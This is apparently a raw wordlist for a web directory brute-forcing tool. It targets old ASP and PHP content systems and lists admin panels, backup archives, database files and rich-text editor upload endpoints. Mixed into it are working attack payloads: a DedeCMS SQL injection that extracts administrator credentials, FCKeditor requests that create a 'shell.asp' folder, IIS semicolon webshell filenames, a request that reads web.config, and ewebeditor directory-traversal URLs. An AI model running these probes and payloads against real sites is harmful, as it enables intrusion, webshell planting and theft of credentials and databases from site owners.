/UpLoadFile
/Class
/server
/Photo
/add
/newbbs
/reg
/hello
/2012/
/adminx/
/user /
/anager/login/
/wp-content/plugins/fucks.txt
/Systemadmin/
/sadmin/
/adminweb
/backgl
/dede
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
/data/mysql_error_trace.inc
/include/dialog/select_media.php?f=form1.murl
/admin
/edit
/Fckeditor
/ewebeditor
/bbs
/Editor
/manage
/shopadmin
/web_Fckeditor
/webadmin
/admin/WebEditor
/admin/daili/webedit
/login/
/database/
/tmp/
/manager/
/manage/
/web/
/admin/
/shopadmin/
/wp-includes/
/edit/
/editor/
/webadmin/
/test/
/data/
/include/
/office/
/southidceditor/
/fckeditor/
/admin/EDITOR/Dialog/
/FCKeditor/editor/
/Editor/Include/
/guestbook/
/kindeditor/
/PayOnline/
/upload/admin/
/setup/
/s_admin/
/fund/
/company/
/edit/db/
/WEB-INF/
/robots.txt
/eWebEditorNet/UploadFile/
/user/
/aspnet_client/system_web/
/aspnet_client/FreeTextBox/
/admin/wo%5Fedit/
/admin/wo%5Fedit/editor/
/11111admin/Editor/SysImage/emot/
/admin/editor/db/
/admin/editor/admin/
/admin/editor/UploadFile/
/admin/editor/include/
/Edit/editor/
/uc/robots.txt
/wfReplace.rar
/syssite/install/
/install/index.html
/如何安装shopex.txt
/rewrite_readme.txt
/360up.exe
/aspcheck/
/aspcheck/Readme.txt
/admin888/
/fonts/sn.txt
/fckeditor/dialog
/aspnet_client/system_web/2_0_50727
/webadmin/htmledit/db/
/webadmin/htmledit/
/syssite/shopadmin/
/syssite/install/installlock.htm
/admin/webeditor/upload.asp?action=save&type=&style=
/admin/EDITOR/Dialog/HELP.HTM
/Admin/Editor/ewebeditor.htm
/admin/editor/admin/LOGIN.GIF
/admin/Edit/editor.htm
/FCKeditor/_whatsnew.html
/FCKeditor/editor/filemanager/upload/test.html
/fckeditor/dialog/fck_about.html
/FCKeditor/_samples/default.html
/admin/js/fckeditor/editor/filemanager/connectors/test.html
/admin/editubb/db/
/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/editor/filemanager/connectors/
/manage/editor/ewebeditor.asp?id=price&style=standard
/server/fckeditor/editor/fckdebug.html
/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0
/htmledit/
/yzstar/1upload_wj.inc
/mdb/
/ewebeditornet/
/system/eWebEditor/admin/
/system/eWebEditor/ewebeditor.htm
/eWebEditor/ewebeditor.htm
/admin/EDITOR/Dialog/file_gy.htm
/system/eWebEditor/asp/
/system/eWebEditor/
/dwkx/
/intraAdmin/
/shsjms/
/aspnet_client/
/phpmyadmin/
/admin/editubb/
/dmtbdata/
/web/downloads/
/database/web/Base/
/intraAdmin/class/
/edit/SysImage/
/fckEditor/editor/
/boke/Edit_Plus/FCKeditor/editor/
/edit/Include/
/Webedit/admin/
/FCKeditor/editor/dialog/
/intraAdmin/phpmyadmin/
/admin/UpFile.asp?gl=file
/admin/UpFile.asp?fp1=D:
/sm.txt
/安装说明.txt
/readme.html
/vcastr.xml
/License.txt
/Database/Qianbo.Qianbo
/IIS/php/php.exe
/IIS/obj/Debug/IIS.exe
/chat/ichatx.exe
/editor/eWebEditor.htm
/editor/editor/eWebEditor.htm
/aspupload/aspupload.exe
/aspupload/%E8%AF%B4%E6%98%8E.txt
/intraAdmin/changelog.txt
/edit/SysImage/ewebeditor.gif
/Edit/V2.80%E4%BF%AE%E6%AD%A3%E7%89%88%E8%AF%B4%E6%98%8E.txt
/bbs/boke/Edit_Plus/FCKeditor/editor/dialog/fck_select.html
/boke/Edit_Plus/FCKeditor/editor/dialog/fck_select.html
/bbs/Dv_plus/IndivGroup/Edit_Plus/FCKeditor/editor/dialog/
/bbs/Dv_plus/IndivGroup/Edit_Plus/FCKeditor/editor/dialog/fck_about.html
/bbs/Dv_plus/IndivGroup/Edit_Plus/FCKeditor/editor/dialog/fck_image.html
/bbs/Dv_plus/IndivGroup/Edit_Plus/FCKeditor/editor/fckdebug.html
/bbs7/Dv_plus/IndivGroup/Edit_Plus/FCKeditor/editor/dialog/fck_about.html
/bbs/boke/Edit_Plus/FCKeditor/editor/dialog/
/bbs/boke/Edit_Plus/FCKeditor/editor/dialog/fck_about.html
/admin/WebEdit/admin_login.asp88
/admin123/inc
/admin123/Login
/forum/admin/
/inc/db
/editor/fckeditor/fckstyles.xml
/inc/editor/fckeditor/fckstyles.xml
/inc/editor/fckeditor/editor/fckdebug.html
/editor/fckeditor/editor/fckdebug.html
/qq.txt
/qq2008jh.txt
/mirserver2.rar
/备份.rar
/webroot.rar
/root.rar
/web.rar
/wwwroot.rar
/info.txt
/NotInsalleda.txt
/升级.txt
/升级包地址.txt
/说明书.txt
/安装说明书.txt
/协议书.txt
/CuteEditor
/admin/CuteEditor
/admin/editor/upload.asp?action=upfile
/tmdqq.asp34
/wolserver.rar
/mirserver1.rar
/ftp.txt
/jinhuQQ.txt
/license.txt
/qq/使用说明.txt
/office/web%5Fadmin/
/admin/wo%5Fedit/editor/fckdebug.html
/admin/wo%5Fedit/editor/filemanager/
/admin/wo%5Fedit/editor/filemanager/test.html
/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/fckeditor/editor/filemanager/connectors/uploadtest.html
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/fckeditor/editor/filemanager/browser/default/connectors/asp/upload.asp?Type=Media"
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
/fckeditor/editor/filemanager/upload/test.html
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/connectors/test.html
/UserFiles/monyer/
/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
/admin/SouthidcEditor/Dialog/help/main.htm
/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=///web.config
/html/webedit/admin/style.asp?action=stylepreview&id=1
/Html/fckeditor/fckstyles.xml
/Html/fckeditor/fcktemplates.xml
/Html/fckeditor/fckpackager.xml
/Html/webEdit/admin/说明.txt
/Html/webEdit/buttonimage/blue/undo.gif
/Html/webEdit/buttonimage/gray/about.gif
/Html/webEdit/dialog/about.htm
/Html/webEdit/dialog/art.htm
/Html/webEdit/dialog/browse.htm
/Html/webEdit/dialog/eq.htm
/Html/webEdit/dialog/fieldset.htm
/Html/webEdit/dialog/findreplace.htm
/Html/webEdit/dialog/fullscreen.htm
/Html/webEdit/dialog/iframe.htm
/Html/webEdit/dialog/importexcel.htm
/Html/webEdit/dialog/importword.htm
/Html/webEdit/dialog/map.htm
/Html/webEdit/dialog/media.htm
/Html/webEdit/dialog/selcolor.htm
/Html/webEdit/dialog/table.htm
/Html/webEdit/dialog/tablecellsplit.htm
/Html/webEdit/dialog/anchor.htm
/Html/webEdit/dialog/backimage.htm
/Html/webEdit/dialog/emot.htm
/Html/webEdit/dialog/ewebeditor.htm
/Html/webEdit/dialog/file.htm
/Html/webEdit/dialog/flash.htm
/Html/webEdit/dialog/hyperlink.htm
/Html/webEdit/dialog/img.htm
/Html/webEdit/dialog/importword(1).htm
/Html/webEdit/dialog/localupload.htm
/Html/webEdit/dialog/marquee.htm
/Html/webEdit/dialog/paragraph.htm
/Html/webEdit/dialog/symbol.htm
/Html/webEdit/dialog/tablecell.htm
/Html/webEdit/sysimage/actualsize.gif
/Html/webEdit/sysimage/bg/christmas.gif
/Html/webEdit/sysimage/file/audio.gif
/Html/webEdit/ewebeditor.htm
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/fckeditor/editor/fckeditor.html
/administrator/
/bbs/phpmyadmin/
/adminhh
/phpadmin/
/admin/phpmyadmin/
/admin/ewebeditor/eWebEditor_Intro_v200.chm
/administrator
/qq/qq/mdb
/shopxp/shopxp/mdb
/qq848456042/qq848456042/mdb
/asp_bin
/webeditor
/adminmanage
/admin/autoedit
/s_admin
/adwin
/master
/includes/fckeditor
/admin/edit
/admin/fckeditor
/admin/ewebeditor
/manage/ewebeditor
/manage/fckeditor
/manage/edit
/ad
/news/
/new
/bm
/inc
/aadmin
/robot.txt
/wwwroot.zip
/www.rar
/www.zip
/eweb
/html
/user
/file
/readme.txt
/system
/system/Fckeditor
/editor/editor/filemanager
/web/FCKeditor/editor/filemanage
/admin/FCKeditor/editor/filemanage
/FCKeditor/editor/filemanage
/tools/fckeditor/editor/filemanager
/apps/trac/pragyan/browser/trunk/cms/modules/article/fckEditor/editor/filemanage
/user/Edit/editor/filemanager
/ispcp/browser/trunk/gui/tools/filemanager/plugins/fckeditor/editor/filemanager
/ThirdPartyControl/fckeditor/editor/filemanage
/web/scripts/nueditor/editor/filemanager
/html/js/editor/fckeditor/editor/filemanager
/html/editor/fckeditor/editor/filemanager
/js/editor/fckeditor/editor/filemanager
/scripts/fckeditor/editor/filemanager/
/common/INC/FckEditor/editor/filemanager
/common/FckEditor/editor/filemanager
/INC/FckEditor/editor/filemanager
/machblog/browser/trunk/fckeditor/editor/filemanager/
/browser/trunk/fckeditor/editor/filemanager/
/results/fckeditor/editor/filemanage
/demo/admin/fckeditor/editor/filemanager
/demo/fckeditor/editor/filemanager
/editor/FCKeditor/editor/filemanager
/ocomon/includes/fckeditor/editor/filemanager
/includes/fckeditor/editor/filemanager
/eWebEditor/
/web/ewebeditor
/dream/_vti_cnf
/admin6
/admin/news/eWebEditor/
/Editor/eWebEditor/
/admin/eWebEditor/
/admin/Editor/
/eWebEditor/asp
/admin/Editor/asp
/Editor/eWebEditor/asp
/Editor/asp
/tools/editor/
/cmseditor
/admin/cmseditor
/WebAdmin/Editor
/jxby/en/kszy2/cx/upfile.htm
/en/kszy2/cx/upfile.htm
/kszy2/cx/upfile.htm
/example/upfile.htm
/upfile.htm
/newbooklb/upfile.htm
/colleges/electron/xszz/tw/upfile.htm
/fsjsout/jhsy/upfile.htm
/jobs/upfile.htm
/chg_admin/upfile.htm
/chg_admin/
/BBS/UploadFile/UpFile.htm
/UploadFile/UpFile.htm
/admin/upfile.htm
/admin-login/upfile.htm
/hunc/scyxx/wep/dialog/upfile.htm
/issuance/inc/upfile.htm
/inc/upfile.htm
/issuance/upfile.htm
/oa/DownLoad/upfile.htm
/DownLoad/upfile.htm
/online/study/upfile.htm
/ft/upfile.htm
/up/upfile.htm
/admin/artics/upfile.htm
/editor/Dialog/example/upfile.htm
/master/UpLoadCom/upfile.htm
/master/upfile.htm
/admin_index
/admin_admin
/admin/index
/aupload/upfile.htm
/admin/default
/admin/manage
/admin/login
//admin/index
//admin/manage
//admin/login
/login
/manage_index
/UpLoad/upfile.htm
/index_manage
/admin%23
/admin_login
/ad_login
/ad_manage
/manager
//admin/default
/houtai
/chkadmin
/chklogin
/adminlogin
/adminuser
/member
/adminedit
/webmaster
/admin_main
/article/admin
/include
/public
/server_stats
/setup
/statistics
/denglu
/wstats
/login/login
/login/index
/login/super
/super
/login%23
/htdocs
/guanli
/source
/telephone
/wenzhang
/update
/count_admin
/add_admin
/admin_pass
/newbbs/login
/down/login
/bbs/admin/login
/main/login
//admin
/manager/login
/blog
/boss/
/xzsysadmin/
/home/
/webmaster/
/log%23n/
/admin_guanli/
/cms/
/infos_admin/
/dvbbs/
/ad/
/1.txt
/test.txt
/users
/DataBackup/
/Data/
/boss
/backup.rar
/xxx.rar
/新建文本文档.txt
/users/Editer/
/bbs/database/
/images/
/alert.txt
/sql.rar
/website.rar
/服务器.rar
/数据库.rar
/diguoo/
/ask/data/
/Web.config
/ESYSManager/
/shop/
/source/
/System/
/_database
/db/
/GuestBook/
/Editor/db
/Editor/data
/boss/admin/
/Chinese/Databackup/DataBack.asa
/Databackup/DataBack.asa
/System_Ctrl
/admin/data
/admin/db
/data8888
/xm%23data
/adminpt/
/mba/
/st-admin/
/admin_user
/admin123
/admin888
/adminadmin
/adminindex
/adminuserlogin
/indexadmin
/index_admin
/houtaiguanli
/members
/Console/login/
/ht/
/htgl
/inside/
/sys/login/
/system/login/
/systems/login/
/xtadmin/
/sys/
/ststems/
/manger/index.htm
/manager.htm
/manage/index.htm
/administration/login_form_admin.htm
/login.htm
/admin/login.htm
/Admin.htm
/admin/index.htm
/lzwadmin/admlogin.htm
/pscms_admin/
/dede/
/LoginPage.do
/index.html
/get.htm
/wocaonima
/down.htm
/login_admin
/count
/adm_login
/adduser
/edituser
/adminadduser
/editmember
/adminmember
/addmember
/logout
/login_out
/admin_edit
/delete
/admindelete
/admin_delete
/admindel
/admin_del
/up
/upload
/upfile
/backup
/config
/root
/admintab
/main
/index.htm
/article
/databases
/database
/db
/dbase
/devel
/files
/forum
/idea
/ideas
/includeinc
/includes
/incoming
/install
/manual
/misc
/private
/program
/programming
/programs
/set
/setting
/sources
/Stats
/usage
/weblog
/weblogs
/webstats
/work
/wwwlog
/admin.html
/admin_config.asp.bak
/admin_data.asp.bak
/code.asp.bak
/commentedit.htm
/config.asp.bak
/conn.asp.bak
/connection.asp.bak
/defalut.html
/default.asp.bak
/default.htm
/default_1.asp.bak
/default1.asp.bak
/default2.asp.bak
/funciton.asp.bak
/inc.asp.bak
/index.asp.bak
/index1.asp.bak
/login.html
/logout.htm
/logout.html
/open.asp.bak
/readme.htm
/setup.asp.bak
/syscode.asp.bak
/test.asp.bak
/upload.htm
/upload.html
/upload.inc
/default2.php.bak
/open.php.bak
/administrator/Shop_Login.htm
/WebAdmin
/asp-bin/manage
/admin_login/admin/admin
/manage123/
/manage/admin/admin
/xwzx
/l888
/article/
/eneya/eneya888
/asp/index.htm
/job/admin/
/uploads
/images
/fckeditor/editor/
/fckeditor/editor/fckeditor.html
/sitemap.xml
/FCKeditor/editor/dialog/fck_spellerpages/spellerp
/admin/FCKeditor/editor/dialog/fck_spellerpages/sp
/admin/editor/
/admin/webeditor/
/admin/ewebeditor/
/.index.jsp.swp
/editor/FCKeditor
/editor/FCKeditor/editor
/editor
/editor/ubbeditor
/weblogin
/2b.apx
/fuck.apx
/database/%23newasp.asa
/data.rar
/data.bak
/data.zip
/dat.rar
/dat.zip
/databak.rar
/databak.zip
/databackup.rar
/databackup.zip
/databack.rar
/databack.zip
/db.rar
/db.zip
/db.bak
/Data/data.rar
/Data/data.bak
/Data/data.zip
/Data/db.rar
/Data/db.zip
/Data/db.bak
/Data/sql.rar
/admin/ydxzdate.asa
/CAurl11.txt
/mirserver.rar
/admin/include/admin.config
/admin/inc/config.inc
/hack86.asx
/backend/admin
/backend/admin/eWebEditor
/ledmin
/backend/eWebEditor/
/ewebedit
/admini
/nimda
/member/
/dede1
/dedecms
/ewebeditor/admin_uploadfile.asp?id=&dir=//
/data/asp99cms.db
/datebase/asp99cms.db
/asp99cms.db
/database2009/sql2009car.config
/database/sql2009car.config
/data/sql2009car.config
/database/asp99cms.db
/12345php
/1.asp.asa
/test.rar
/admin/Databackup
/oa/ad_login/jsp
/a.asp;(1).jpg
/a.asp;.jpg
/a.aspx;(1).jpg
/a.aspx;.jpg
/a.php;(1).jpg
/a.php;.jpg
/1.asa
/2.asa
/3.asa
/4.asa
/5.asa
/6.asa
/7.asa
/8.asa
/9.asa
/a.asa
/b.asa
/c.asa
/dama.asa
/diy.asa
/123.asa
/1234.asa
/HTML
/admini/HTML
/admin/html
/ad/html
/guanli/html
/admin/editpage
/ad/editpage
/editpage
/include/htmleditor/admin
/include/htmleditor/
/admin/include/htmleditor/admin
/123.txt
/guanli.txt
/kongjian.txt
/admins
/adminmaster
/datas
/webedit
/admn/webedit
/adminis
/iudb.asa
/back.asa
/guo.asa
/sx.asa
/qq.asa
/web.asa
/jinfo.asa
/global.asa
/db/%23qt%23.asa
/day.asa
/admina
/adminc
/adminm
/adminit
/manage_microfan
/microfan
/manager_microfan
/admin_microfan
/do/edit
/do
/do/editor
/do/webeditor
/UploadFiles/x.asp;(1).jpg
/UploadFiles/shell.asp;(1).jpg
/x.asp;(1).jpg
/521.asa
/520.asa
/aas.asa
/panda.asa
/kh.asa
/@dmin
/admin/webedit
/admin/ewebedit
/admin/ewebeditor/admin_uploadfile.asp?id=&dir=/
/ewebedit/admin_uploadfile.asp?id=&dir=//
/admin/ewebedit/admin_uploadfile.asp?id=&dir=//
/webeditor/admin_uploadfile.asp?id=&dir=//
/admin/webeditor/admin_uploadfile.asp?id=&dir=/.
/admin/editor/admin_uploadfile.asp?id=&dir=//
/webedit/admin_uploadfile.asp?id=&dir=//
/admin/webedit/admin_uploadfile.asp?id=&dir=//
/ebedit/admin_uploadfile.asp?id=&dir=//
/admin/ebedit/admin_uploadfile.asp?id=&dir=//
/hxhack.asa
/oledit/admin_uploadfile.asp?id=&dir=/.
/admin/oledit/admin_uploadfile.asp?id=&dir=/.
/xfxm.asa
/xfdm.asa
/by_seven.aspa
/seven.asa
/admin_8da
/admin/Oledit/admin_uploadfile.asp?id=1&dir=//
/admin/Oledit
/Oledit
/sqlin.asa
/hack2b.asa
/bai.asa
/bai.asp;1.jpg
/bai.asa;1.jpg
/bai.cer;1.jpg
/bai.php;1.jpg
/bai.aspx;1.jpg
/inde.asp.asa
/conm.asa
/board/editor/sample.html
/editor/sample.html
/sample.html
/admin/board/editor/sample.html
/admin/editor/sample.html
/editor/board/editor/sample.html
/htmleditor/board/editor/sample.html
/edit/board/editor/sample.html
/htmledit/board/editor/sample.html
/board/edit/sample.html
/0cmd.asa
/lavery_Edit
/admin/lavery_Edit
/6789.asa
/ddbb
/6788.asa
/newsadmin/ubb
/newsadmin
/ubb
/adm1n
/FCKeditor/editor/filemanager/browser/default/conn
/editor/filemanager/browser/default/connectors/tes
/editor/filemanager/upload/test.html
/editor/filemanager/connectors/test.html
/editor/filemanager/connectors/uploadtest.html
/htgl/webeditor
/fuckyou.asa
/configs.asa
/tool.asa
/lanser.asa
/adminbdbur
/admin_folder
/1111.asa
/%23ksqdate/%23xidate.dmb
/%23ksqdate
/ManageAdmin
/Manage_Admin
/Adminmanage
/ManageAdmin/ArticleEditor/UpFile.asp?ActionID=Upl
/manageradmin
/manager_admin
/adminmanager
/admin_manager
/80sec.asa
/sql.asa
/demo/
/platform.xml
/data/%23data.asa
/data/%23data1.asa
/Download_Upload.asp?formname=myform&editname=Imag
/msn.asa
/touch/Include/ewebeditor
/Include/ewebeditor
/long.asa
/lang.asa
/读我.txt
/说明.txt
/說明.txt
/txt.asa
/toptxt.asa
/WebEditor
/fck
/user/filesMain.asp?fmFileType=image
/filesMain.asp?fmFileType=image
/aspnet_client/system_web/2_0_50727/
/admin/up
/up_img
/sms
/sms/
/adm
/adm/
/sysmanage
/sysmanage/
/Data/%23Ylmv_data.asa
/Data/Ylmv_data.asa
/date/Idea_Site.asa
/admin/webeditor
/21.asa
/80.asa
/aima.asa
/qq232174321.asa
/admin_file/
/admin_file
/SystemAdmin/eWebEdit
/SystemAdmin/
/SystemAdmin
/help
/help/
/bao.asa
/szwyadmin/
/ask/data/ask_newasp.asa
/ask/data/%23ask_newasp.asa
/admin_shopxp
/admin_shopxp/
/shopxp_admin
/admin_shopxp/editubb
/admin/editubb
/editubb
/hjadmin/
/sitemanager
/sitemanage
/siteadmin
/wo.asa
/hx99.orgdata
/hx99.org%23data
/HX_admin
/phpMyAdmin-3.4.2-all-languages
/admin_niao
/cnmk.asa
/gucci.asa
/admin77
/data/nimageb.asa
/data/nimagebi.asa
/admin_manage_access
/admin_manage
/manage_access
/admin_access
/qdmins
/qdmin
/include/dialoguser/
/ctrladmin
/administration
/login_form_admin.htm
/login_from_admin
/login_from_manage
/login_manage
/login_manager
/login_system
/login_from_system
/ubbcode
/admin/do/
/sdsd.asa
/sd.asa
/0.rar
/000.rar
/0000.rar
/1.rar
/11.asa
/11.rar
/110.rar
/1100.rar
/111.asa
/111.rar
/12.rar
/120.rar
/1200.rar
/1212.rar
/123.rar
/1234.rar
/12345.asa
/12345.rar
/123456.asa
/123456.rar
/123456789/123456789.asa
/126bqq2008jh.txt
/130.rar
/135.rar
/136.rar
/138f.rar
/14.rar
/2.txt
/20081001.rar
/22.asa
/22.rar
/222.asa
/222.rar
/3.rar
/3.txt
/320.rar
/3210.asa
/33.asa
/33.rar
/333.asa
/333.rar
/450.rar
/4tqeqq.txt
/520.rar
/6ycoqq.txt
/77169.txt
/8.rar
/9090/board.html
/9090/examples/applications/bboard/bboard_frames.html
/9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/9knejinhuQQ2007.txt
/ALLIP.txt
/Admin/fckeditor/editor/filemanager/browser/default/browser.html
/Admin/fckeditor/editor/filemanager/connectors/test.html
/AdminLogin.htm
/AdminLogin.html
/Admin_Cy/DataBackup/DataBack.asa
/BBSXPplay/exobud.htm
/BBSXPplay/list.htm
/CFIDE/Administrator/startstop.html
/DKserver.rar
/Data.asa
/Data/Sheep.asa
/Data/wrtxcnshop2.asa
/Data/yxbbs.asa
/DataBase/DB.asa
/DataShop/datashop.asa
/Databack/PowerEasy.asa
/Databackup/PowerEasy.asa
/Database/Data.asa
/Database/DataShop.asa
/Datas/datas.asa
/Documentation.txt
/Edit/editor/fckeditor.html
/Edit/editor/filemanager/browser/default/browser.html
/Edit/editor/img.htm
/ErrorLog.txt
/FCKeditor/editor/fckeditor.html
/FCKeditor/editor/filemanager/browser/default/browser.html
/Fuzhuang_Fushi/index.htm
/GOOGLE1bb9e40669bc959a.html
/GameOfmir.rar
/Gehang_Geye/index.htm
/Gongye_Zhipin/index.htm
/Guowai_Wangzhan/index.htm
/Heike_Anquan/index.htm
/Huagong_Nengyuan/index.htm
/ImageMap.htm
/InsertEmotion.htm
/Install/rotocol.txt
/Jianzhan_Sheji/index.htm
/Keji_IT/index.htm
/KingServer.rar
/LeapFTP.rar
/Log.htm
/Mailend.txt
/Menu.htm
/Mianfei_Ziyuan/index.htm
/MirServer3.rar
/Mirserver2.rar
/Mirserver4.rar
/NBA_lanqiu/index.htm
/NBArticle.asa
/NewFile.txt
/Nonglin_Muyu/index.htm
/PPEditor/ewebeditor.htm
/PSUser/PSCOErrPage.htm
/Play.txt
/Preview.htm
/QQtest.txt
/Qiche_Qipei/index.htm
/RSwow.txt
/ReadMe.txt
/Readme_CHS.txt
/Readme_CHT.txt
/Result.txt
/Secure/Local/console/cmhome.htm
/Server.html
/ServerList.txt
/Shangwu_Maoyi/index.htm
/Shop_Login.htm
/ShowForum.htm
/ShowPost.htm
/Sousuo_Yinqing/index.htm
/TDdownload/621netlove.rar
/TDdownload/cxshop031011.rar
/TDdownload/wgxzdown3.5.rar
/TJ.txt
/TextFile.txt
/TransLog.txt
/UpFile2.htm
/Uploadfile.htm
/Uploadfile1.htm
/VIEWGOOD.rar
/WEB2010-1-21.rar
/Wangba_Lianmeng/index.htm
/Web2000/oor/content_areas/authorize/auth.txt
/Web2000/oor/content_areas/members/auth.txt
/WebEdit/ewebeditor.htm
/WebManage/module/eWebEditor/Dialog/about.htm
/Wol2008.rar
/Yingjian_Zixun/index.htm
/Yinshua_Chuban/index.htm
/Zerius/oor/content_areas/members/auth.txt
/Zerius/oor/content_areas/secure/auth.txt
/Zreditor/ewebeditor.htm
/Zuqiu_Tianxia/1025.htm
/Zuqiu_Tianxia/index.htm
/__vti_inf.html
/_privat/ats/logs/writeto.txt
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_vt_bin/cfgwiz.exe
/_vt_bin/contents.htm
/_vt_bin/fpadmin.htm
/_vt_bin/fpremadm.exe
/_vti_bin/_vti_aut/author.exe
/_vti_bin/fpcount.exe
/_vti_bin/shtml.dll/nosuch.htm
/_vti_bin/shtml.dll/tstt.htm
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_log/_vti_cnf/default.htm
/_vti_log/default.htm
/_vti_pvt/shtml.exe
/_vti_txt/_vti_cnf/default.htm
/_vti_txt/default.htm
/a_security.htm
/aa.asa
/aaa.asa
/about.htm
/acblog.asa
/access.txt
/access/ats/logs/writeto.txt
/access/auth.txt
/access/crontab.txt
/access/expire.txt
/access/htpass.txt
/access/memberlist.txt
/access/sf2.asa
/access7/auth.txt
/account.html
/acctman/info/ats/logs/writeto.txt
/ad/up.htm
/admcgi/contents.htm
/admin.exe
/admin.htm
/admin.ini
/admin.rar
/admin.txt
/admin/%23m_x%23data.asa
/admin/AdminLogin.htm
/admin/AdminLogin.html
/admin/Menu.htm
/admin/account.html
/admin/controlpanel.html
/admin/cp.html
/admin/crontab.txt
/admin/data/qcdn_news.asa
/admin/data/xsjnews.asa
/admin/databackup/ebossi_data_backup.asa
/admin/db/ats/logs/writeto.txt
/admin/editor/editor/filemanager/upload/test.html
/admin/eweb/ewebeditor.htm
/admin/ewebeditor.htm
/admin/ewebeditor/db/ewebeditor.asa
/admin/expire.txt
/admin/fckeditor/editor/filemanager/browser/default/browser.html
/admin/fckeditor/editor/filemanager/connectors/test.html
/admin/fckeditor/editor/filemanager/connectors/upload.html
/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
/admin/fileupload.html
/admin/getpic.htm
/admin/htmledit/Example/NewsSystem/readme.txt
/admin/htmledit/V2.80修正版说明.txt
/admin/htmleditor/ewebeditor.htm
/admin/index.html
/admin/login.asa
/admin/login.html
/admin/manage.htm
/admin/shopbackup.asa
/admin/systemfile.html
/admin/test.txt
/admin/tupian.htm
/admin/up.htm
/admin/up/upload.htm
/admin/upfile.rar
/admin/upfile/UpFile.htm
/admin/upfile/UpFile2.htm
/admin/upfile/Upload.htm
/admin/upfile/Upload2.htm
/admin/upload.htm
/admin/upload/Upload.htm
/admin/upload/Upload2.htm
/admin/upme2.htm
/admin1.html
/admin2.html
/webs.rar
